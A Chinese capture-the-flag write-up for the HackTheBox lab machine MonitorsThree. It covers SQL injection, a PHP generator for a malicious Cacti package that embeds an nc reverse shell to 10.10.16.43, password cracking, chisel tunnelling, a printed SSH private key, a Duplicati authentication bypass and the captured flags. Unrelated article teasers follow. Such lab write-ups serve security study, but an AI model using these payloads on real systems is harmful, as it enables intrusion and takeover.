[Meachines] [Medium] MonitorsThree SQLI+Cacti-CMS-RCE+Duplicati权限提升

news2024/11/13 10:15:27

信息收集

IP AddressOpening Ports
10.10.11.30TCP:22,80

$ nmap -p- 10.10.11.30 --min-rate 1000 -sC -sV -Pn

PORT      STATE    SERVICE       VERSION
22/tcp    open     ssh           OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
|_  256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
80/tcp    open     http          nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerne

Cacti

# echo '10.10.11.30 monitorsthree.htb' >>/etc/hosts

http://monitorsthree.htb/

image.png

$ ffuf -w ~/Subdomain.txt -u http://monitorsthree.htb -H 'HOST: FUZZ.10.10.11.30' -fs 13560

image-1.png

# echo '10.10.11.30 cacti.monitorsthree.htb' >>/etc/hosts

http://cacti.monitorsthree.htb/cacti/

image-2.png

$ sqlmap -u 'http://monitorsthree.htb/forgot_password.php' --level=5 --risk=3 --batch

image-37.png

admin:greencacti2001

image-3.png

<?php

$xmldata = "<xml>
   <files>
       <file>
           <name>resource/test.php</name>
           <data>%s</data>
           <filesignature>%s</filesignature>
       </file>
   </files>
   <publickey>%s</publickey>
   <signature></signature>
</xml>";
$filedata = "<?php shell_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.43 10032 >/tmp/f'); ?>";
$keypair = openssl_pkey_new(); 
$public_key = openssl_pkey_get_details($keypair)["key"]; 
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
file_put_contents("test.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
system("cat test.xml | gzip -9 > test.xml.gz; rm test.xml");

?>

$ php rev.php

Import/Export -> Import Packages

image-4.png

image-5.png

www-data@monitorsthree:~/html$ cat /var/www/html/cacti/include/config.php

user:cactiuser password:cactiuser

MariaDB [cacti]> select * from user_auth\G;

image-10.png

$2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK

$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

image-11.png

user:marcus password:12345678910

www-data@monitorsthree:~/html/cacti/resource$ su marcus

image-12.png

User.txt

f9fb42ef0c734ab3310e509e6b1117c5

Privilege Escalation && Duplicati

$ ./chisel client 10.10.16.43:8000 R:8200:localhost:8200

$ chisel server -p 8000 --reverse

image-9.png

image-8.png

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

$ scp -i /tmp/id_rsa marcus@monitorsthree.htb:/opt/duplicati/config/Duplicati-server.sqlite .

$ sqlite3 Duplicati-server.sqlite

image-14.png

image-17.png

$ echo 'Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=' | base64 -d | xxd -p -c 256

image-18.png

get-nonce=1

image-22.png

2dlBrErvpm9f5CXhY945hSOXSKoL0dlRcP8/4L0sRXM=

var saltedpwd = '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a'; 
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('2dlBrErvpm9f5CXhY945hSOXSKoL0dlRcP8/4L0sRXM=') + saltedpwd)).toString(CryptoJS.enc.Base64);
console.log(noncedpwd);

image-23.png

password=h4LMqdVeLuzUINQU48IOw%2bCMiGqxaMi6rs/p1CDsm0Y%3d

image-24.png

image-25.png

http://127.0.0.1:8200/ngax/index.html#/add

image-26.png

/source/tmp/

image-33.png

/source/root/root.txt

image-28.png

添加路径

image-32.png

image-30.png

http://127.0.0.1:8200/ngax/index.html#/restorestart

image-31.png

http://127.0.0.1:8200/ngax/index.html#/restore/18

image-34.png

image-35.png

image-36.png

$ marcus@monitorsthree:~/root.txt$ cat root.txt

Root.txt

0bc465bacfe9ffc0f42898508faafa69

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2237853.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

AndroidStudio-文本显示

一、设置文本的内容 1.方式&#xff1a; &#xff08;1&#xff09;在XML文件中通过属性&#xff1a;android:text设置文本 例如&#xff1a; <?xml version"1.0" encoding"utf-8"?> <LinearLayout xmlns:android"http://schemas.andr…

pyspark入门基础详细讲解

1.前言介绍 学习目标&#xff1a;了解什么是Speak、PySpark&#xff0c;了解为什么学习PySpark&#xff0c;了解课程是如何和大数据开发方向进行衔接 使用pyspark库所写出来的代码&#xff0c;既可以在电脑上简单运行&#xff0c;进行数据分析处理&#xff0c;又可以把代码无缝…

uniapp上拉刷新下拉加载

方法一&#xff1a; z-paging 的组件库&#xff1a; show-loading-more-no-more-view"false" 该属性控制是否显示 "加载更多" 或 "没有更多" 的提示。如果设为 false&#xff0c;则不会显示这些提示。如果设为 true&#xff0c;当数据加载完毕…

CSS教程(二)- CSS选择器

1. 作用 匹配文档中的某些元素为其应用样式。根据不同需求把不同的标签选出来。 2. 分类 分类 基础选择器 包含 标签选择器、ID选择器、类选择器、通用选择器等 复合选择器 包含 后代选择器、子代选择器、伪类选择器等 1 标签选择器 介绍 又称为元素选择器&#xff0c;根…

LeetCode 56.合并区间

思路&#xff1a; 类似于用最少的箭射气球题目&#xff0c;最主要是要处理区间之间是否有重叠&#xff0c;如果无重叠则加入数组&#xff0c;如果有重叠&#xff0c;则需要重新设判断的边界&#xff0c;与下一个区间继续判断。 难点在于 代码用法 需熟练掌握 思想简单&#…

【MySQL】MySQL基础知识复习(上)

前言 本篇博客将复习MySQL的基础知识&#xff0c;及着重复习CRUD&#xff08;增删查改&#xff09;操作。 目录 一.MySQL数据库基础知识 1.数据库操作 1.1显示当前的数据库 1.2 创建数据库 1.3 使用数据库 1.4 删除数据库 2.数据类型 2.1.数字类型 2.2字符串类型 2.3…

华为大变革?仓颉编程语言会代替ArkTS吗?

在华为鸿蒙生态系统中&#xff0c;编程语言的选择一直是开发者关注的焦点。近期&#xff0c;华为推出了自研的通用编程语言——仓颉编程语言&#xff0c;这引发了关于仓颉是否会取代ArkTS的讨论。本文将从多个角度分析这两种语言的特点、应用场景及未来趋势&#xff0c;探讨仓颉…

稀硫酸介质中 V 型球阀的材质选择与选型要点-耀圣

稀硫酸介质中 V 型球阀的材质选择与选型要点 在工业生产中&#xff0c;稀硫酸是一种常见的化学介质&#xff0c;对于输送和控制稀硫酸的阀门&#xff0c;正确的材质选择和选型至关重要。本文将介绍稀硫酸介质中 V 型球阀的材质选择&#xff0c;并提供一些选型的要点。 一、稀硫…

昇思大模型平台打卡体验活动:项目3基于MindSpore的GPT2文本摘要

昇思大模型平台打卡体验活动&#xff1a;项目3基于MindSpore的GPT2文本摘要 1. 环境设置 本项目可以沿用前两个项目的相关环境设置。首先&#xff0c;登陆昇思大模型平台&#xff0c;并进入对应的开发环境&#xff1a; https://xihe.mindspore.cn/my/clouddev 接着&#xff0…

定时器输入捕获实验配置

首先&#xff0c;第一个时基工作参数配置 HAL_TIM_IC_Init( ) 还是一样的套路&#xff0c;传参是一个句柄&#xff0c;先定义一个结构体 Instance&#xff1a;指向TIM_TypeDef的指针&#xff0c;表示定时器的实例。TIM_TypeDef是一个包含了定时器寄存器的结构体&#xff0c;用…

计算机视觉读书系列(1)——基本知识与深度学习基础

研三即将毕业&#xff0c;后续的工作可能会偏AI方向的计算机视觉方面&#xff0c;因此准备了两条线来巩固计算机视觉基础。 一个是本系列&#xff0c;阅读经典《Deep Learning for Vision System》&#xff0c;做一些总结跑一些例子&#xff0c;也对应本系列文章 二是OpenCV实…

运维智能化转型:AIOps引领IT运维新浪潮

1. AIOps是什么&#xff1f; AIOps&#xff08;Artificial Intelligence for IT Operations&#xff09;&#xff0c;即人工智能在IT运维中的应用&#xff0c;通过机器学习技术处理运维数据&#xff08;如日志、监控信息和应用数据&#xff09;&#xff0c;解决传统自动化运维…

SkyNet嵌入式系统目标检测实践测试分析

目标检测和跟踪对于资源受限的嵌入式系统来说是具有挑战性的任务。尽管这些任务是人工智能领域中计算量最大的任务之一&#xff0c;但它们在嵌入式设备上只能使用有限的计算和内存资源。与此同时&#xff0c;这种资源受限的实现通常需要满足额外的苛刻要求&#xff0c;如实时响…

「OC」SDWebimage的学习

「OC」SDWebimage的学习 前言 在知乎日报这个项目之中&#xff0c;我在很多情况下都会进行图片资源的网络申请。通过上网搜索我了解到了SDWebimage这个功能丰富的第三方库&#xff0c;进行了较为浅层的学习。因为SDWebimage这个库之中的相关内容还是较为多且复杂的&#xff0…

SIwave:释放 SIwizard 求解器的强大功能

SIwave 是一种电源完整性和信号完整性工具。SIwizard 是 SIwave 中 SI 分析的主要工具&#xff0c;也是本博客的主题。 SIwizard 用于研究 RF、clock 和 control traces 的信号完整性。该工具允许用户进行瞬态分析、眼图分析和 BER 计算。用户可以将 IBIS 和 IBIS-AMI 模型添加…

Kafka 可观测性最佳实践

Kafka 概述 Kafka 是由 LinkedIn 开发一个分布式的基于发布订阅模式的消息队列&#xff0c;是一个实时数据处理系统&#xff0c;可以横向扩展。与 RabbitMQ、RockerMQ 等中间件一样拥有几大特点&#xff1a; 异步处理服务解耦流量削峰 监控 Kafka 是非常重要的&#xff0c;因…

342--358作业整理(错误 + 重点)

目录 1. 在需要运行的类中 定义 main 方法 2. this 。访问逻辑&#xff1a;先访问本类中&#xff0c;再访问父类中可以访问的成员&#xff08;不包括和本类中重名的成员&#xff09; 3. super 。访问逻辑&#xff1a;super&#xff08;父类对象&#xff09;直接访问父类及以…

Android自启动管控

1. 自启动管控需求来源 自启动、关联启动、交叉启动、推送启动等现象的泛滥除了对个人信息保护带来隐患外&#xff0c;还会导致占用过多的系统CPU和内存资源&#xff0c;造成系统卡顿、发热、电池消耗过快&#xff1b;还可能引入一些包含“恶意代码”的进程在后台隐蔽启动&…

智能的编织:C++中auto的编织艺术

在C的世界里&#xff0c;auto这个关键字就像是一个聪明的助手&#xff0c;它能够自动帮你识别变量的类型&#xff0c;让你的代码更加简洁和清晰。下面&#xff0c;我们就来聊聊auto这个关键字的前世今生&#xff0c;以及它在C11标准中的新用法。 auto的前世 在C11之前&#x…